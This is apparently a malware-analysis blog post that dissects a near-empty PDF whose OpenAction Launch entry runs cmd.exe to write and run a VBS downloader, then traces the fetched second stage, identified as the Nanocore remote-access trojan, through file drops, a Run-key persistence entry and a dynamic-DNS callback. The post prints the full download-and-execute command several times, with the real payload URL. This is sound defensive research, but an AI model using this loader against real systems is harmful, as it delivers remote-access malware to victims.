Pretty simple PDF file was uploaded to VT today, and only 11 of our 59 vendors mark is as malicious, despite it’s being pretty tiny and clearly bad. The file makes no effort at showing any real cover, and could even be a test upload from the malicious actor. The file writes a vbs script which downloads the next stage, and then runs the script and then the resulting binary. The stage two is still up, so I got a copy, which I was able to identify as nanocore, and do some basic dynamic analysis of that as well.

# File Info

 Filename YourExploit.pdf md5 6431c1ec0bd147dbbccaa09ca94b0cd8 VT Link https://www.virustotal.com/#/file/13d48d84c7207afc43076627e944423ab6d7d2e781517bc5e8d4b6e694c51c21/detection

The file was uploaded to VT 2018-09-12 15:38:53 as YourExploit.pdf. This name was probably renamed by the submitter, or else this sample was being uploaded by the actor to see if it would get past AV.

# VT Detections

There’s only 11 engines detecting this as malicious, despite the general lack of legit content and only minimal obfuscation:

# PDF

## General Structure

This pdf has no real content in it. When you open it, it’s a blank page.

If we look at the size of it, it has some size, but if we take out these long lines of what I can only figure are comments as space filling junk, 93% of the characters are gone:

~/malware/YourExploit.pdf $cat 13d48d84c7207afc43076627e944423ab6d7d2e781517bc5e8d4b6e694c51c21 | wc 96 267 27738 ~/malware/YourExploit.pdf$ cat 13d48d84c7207afc43076627e944423ab6d7d2e781517bc5e8d4b6e694c51c21 | grep -vF // | wc
75     246    1988


Almost every object in the pdf has long lines of random capital letters, all starting with / /. Here’s an example, object 2, the page:

obj 2 0
Type: /Pages
Referencing: 3 0 R

<<
/Kids [ 3 0 R ]
/Count 1
/Type /Pages
>>


I think that is like a comment, and can be ignored. I suspect that was added by the authors to give the pdf some size, make it believable. If you know for sure, please leave a comment below. I’ll cut these lines out of text displayed throughout the rest of this post.

## PDF Structure

The PDF is tiny, with only 5 objects, all on 1 page (which is common for malicious pdfs):

pdfid.py 13d48d84c7207afc43076627e944423ab6d7d2e781517bc5e8d4b6e694c51c21
PDFiD 0.2.4 13d48d84c7207afc43076627e944423ab6d7d2e781517bc5e8d4b6e694c51c21
obj                    5
endobj                 5
stream                 1
endstream              0
xref                   1
trailer                1
startxref              1
/Page                  1
/Encrypt               0
/ObjStm                0
/JS                    0
/JavaScript            0
/AA                    0
/OpenAction            1
/AcroForm              0
/JBIG2Decode           0
/RichMedia             0
/Launch                1
/EmbeddedFile          0
/XFA                   0
/URI                   0
/Colors > 2^24         0


## OpenAction (and Launch)

The OpenAction and Launch items from pdfid.py are both in object 1, as shown by pdf-parser.py:

~/malware/YourExploit.pdf $pdf-parser.py 13d48d84c7207afc43076627e944423ab6d7d2e781517bc5e8d4b6e694c51c21 --search OpenAction obj 1 0 Type: Referencing: 2 0 R << /OpenAction << /S /Launch /Win << /F '(\\103:\\\\Windows\\\\system32\\\\cmd.exe)' /P '(/c @echo strLink = "\\150\\164\\164\\160\\072\\057\\057www.materagricultura.com/nano.exe"' >> %temp%/x.\166\142\163 && @echo:>> %temp%/x.\166\142\163 && @echo strSaveTo = "%temp%/x.exe" >> %temp%/x.\166\142\163 && @echo Set objHTTP = CreateObject( "WinHttp.WinHttpRequest.5.1" ) >> %temp%/x.\166\142\163 && @echo objHTTP.Open "GET", strLink, False >> %temp%/x.\166\142\163 && @echo objHTTP.Send >> %temp%/x.\166\142\163 && @echo Set objFSO = CreateObject("Scripting.FileSystemObject") >> %temp%/x.\166\142\163 && @echo Dim objStream >> %temp%/x.\166\142\163 && @echo Set objStream = CreateObject("ADODB.Stream") >> %temp%/x.\166\142\163 && @echo With objStream >> %temp%/x.\166\142\163 && @echo .Type = 1 'adTypeBinary >> %temp%/x.\166\142\163 && @echo .Open >> %temp%/x.\166\142\163 && @echo .Write objHTTP.ResponseBody >> %temp%/x.\166\142\163 && @echo .SaveToFile strSaveTo >> %temp%/x.\166\142\163 && @echo .Close >> %temp%/x.\166\142\163 && @echo End With >> %temp%/x.\166\142\163 && %temp%/x.vbs && %temp%/x.exe "PDF Encrypted. Please click 'Open')" >> >>  ### Mistaken Output from pdf-parser.py It actually turns out that pdf-parser.py deosn’t quite handle the object correctly. I suspect that’s because it mishandles one of the >> which is actually a part of the text of the object as an object boundary. Here’s the actual string from the pdf: 1 0 obj << /OpenAction << /S /Launch /Win << /F (\103:\\Windows\\system32\\cmd.exe) /P (/c @echo strLink = "\150\164\164\160\072\057\057www.materagricultura.com/nano.exe" >> %temp%/x.\166\142\163 && @echo:>> %temp%/x.\166\142\163 && @echo strSaveTo = "%temp%/ x.exe" >> %temp%/x.\166\142\163 && @echo Set objHTTP = CreateObject( "WinHttp.WinHttpRequest.5.1" ) >> %temp%/x.\166\142\163 && @echo objHTTP.Open "GET", strLink, False >> %temp%/x.\166\142\163 && @echo objHTTP.Send >> %temp%/x.\166\142\1 63 && @echo Set objFSO = CreateObject("Scripting.FileSystemObject") >> %temp%/x.\166\142\163 && @echo Dim objStream >> %temp%/x.\166\142\163 && @echo Set objStream = CreateObject("ADODB.Stream") >> %temp%/x.\166\142\163 && @echo With objS tream >> %temp%/x.\166\142\163 && @echo .Type = 1 'adTypeBinary >> %temp%/x.\166\142\163 && @echo .Open >> %temp%/x.\166\142\163 && @echo .Write objHTTP.ResponseBody >> %temp%/x.\166\142\163 && @echo .SaveToFile strSaveTo >> %temp%/x.\166 \142\163 && @echo .Close >> %temp%/x.\166\142\163 && @echo End With >> %temp%/x.\166\142\163 && %temp%/x.vbs && %temp%/x.exe PDF Encrypted. Please click 'Open') >> >> /Pages 2 0 R /Type /Catalog >>  ### Breakdown of OpenAction I pulled out the Adobe Portable Document Format Reference to understand what was going on here. Typically, in PDFs I’ve looked at in the past, the OpenAction had references to javascript or other code that was to run. I’m guessing this is an indication that this PDF was made by hand. The reference describes an OpenAction as follows: (Optional; PDF 1.1) A value specifying a destination to be displayed or dictionary an action to be performed when the document is opened. The value is either an array defining a destination (see Section 8.2.1, “Destinations”) or an action presenting an action (Section 8.5, “Actions”). If this entry is absent, the document should be opened to the top of the first page at the default magnification factor. So while I’m used to seeing an array defining a destination, in this case, we have an action. What’s an action? According to the reference: An action dictionary defines the characteristics and behavior of an action. Table 8.29 shows the required and optional entries that are common to all action dictionaries. The dictionary may contain additional entries specific to a particular action type; see the descriptions of individual action types in Section 8.5.3, “Action Types,” for details. Finally, we’ll take a look at a Launch Action: A launch action launches an application or opens or prints a document. Table 8.37 shows the action dictionary entries specific to this type of action. The optional Win, Mac, and Unix entries allow the action dictionary to include platform-specific parameters for launching the designated application. If no such entry is present for the given platform, the F entry is used instead. Table 8.38 shows the platform-specific launch parameters for the Windows platform; those for the Mac OS and UNIX platforms are not yet defined at the time of publication. ### OpenAction in this PDF With the theory out of the way, let’s look at our PDF: We have an OpenAction, with an Action inside. That action has /S /Launch, defining the action type. The, the action must have either a /F or an OS-specific key. We see /Win at the top of the blue box. And then, inside the Windows Specific action, we see /F giving the command to run (red), and /P giving the parameters to that command. At the end of the day, at open, this PDF will try to run the following (spacing cleaned up by me): C:\Windows\system32\cmd.exe /c ‘ @echo strLink = “http://www.materagricultura.com/nano.exe" >> %temp%/x.vbs && @echo:>> %temp%/x.vbs && @echo strSaveTo = "%temp%/x.exe" >> %temp%/x.vbs && @echo Set objHTTP = CreateObject( "WinHttp.WinHttpRequest.5.1" ) >> %temp%/x.vbs && @echo objHTTP.Open "GET", strLink, False >> %temp%/x.vbs && @echo objHTTP.Send >> %temp%/x.\166\142\163 && @echo Set objFSO = CreateObject("Scripting.FileSystemObject") >> %temp%/x.vbs && @echo Dim objStream >> %temp%/x.vbs && @echo Set objStream = CreateObject("ADODB.Stream") >> %temp%/x.vbs && @echo With objStream >> %temp%/x.vbs && @echo .Type = 1 'adTypeBinary >> %temp%/x.vbs && @echo .Open >> %temp%/x.vbs && @echo .Write objHTTP.ResponseBody >> %temp%/x.vbs && @echo .SaveToFile strSaveTo >> %temp%/x.vbs && @echo .Close >> %temp%/x.vbs && @echo End With >> %temp%/x.vbs && %temp%/x.vbs && %temp%/x.exe PDF Encrypted. Please click 'Open'   This will build a vbs script that will download a file from http://www.materagricultura.com/nano.exe. It then runs the script, and then executes the exe that the vbs script downloads. I can’t quite explain the string at the end. It’s almost like a lure or piece of social engineering that doesn’t seem to work or do anything. I think it’ll be taken as an arg to x.exe (which is likely not used by the binary). # Stage 2 ## Acquisition At the time of writing, the stage two c2 of http://www.materagricultura.com/nano.exe was still up, and I was able to grab the next stage with curl. ## VT I submitted it to VT, and was the first to do so. Where many missed the PDF, not so many missed the exe: ## Identification - Nanocore Based on the names of the signatures, the name of the exe itself, and some googling, it looks like this is nanocore, a piece of malware available for sale on the dark web. I found some Nanocore yara rules in the Yara-Rules GitHub, and they matched on this sample as Gen2: $ yara RAT_Nanocore.yar nano.exe
Nanocore_RAT_Gen_2 nano.exe


## Dynamic Analysis

I did some quick dynamic analysis of what this malware tries to do. Watching with Procmon, we can see the malware:

1. Create file C:\Users\[user]\AppData\Roaming\[guid]\run.dat
2. Create file C:\Program Files (x86)\NFTS Manager\ntfsmgr.exe
• This is an exact copy of nano.exe
• On another run of the same malware, it ended up in C:\Program Files (x86)\LAN Service\lansv.exe
3. Create a persistence run key: HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\NTFS Manager with value C:\Program Files (x86)\NTFS Manager\ntfsmgr.exe
• On other run, similar key with name to match file.
4. Attempt a DNS resolution of trollo991.ddns.net`
• This is a dynamic DNS provider, so it’s likely short lived

## Outstanding Questions

Since I wasn’t connected to the internet, I didn’t get to see what happened when the DNS resolution succeeded. It’d also be interesting to see how many different names it will persist under.

# Summary

This was a super simple PDF, that was fooling most of the endpoint products. I can theorize that this PDF was crafted by hand, and was done so either to test the process, or without regard to for any kind of lure. The stage two was commercially available malware that was caught by most reputable endpoint agents.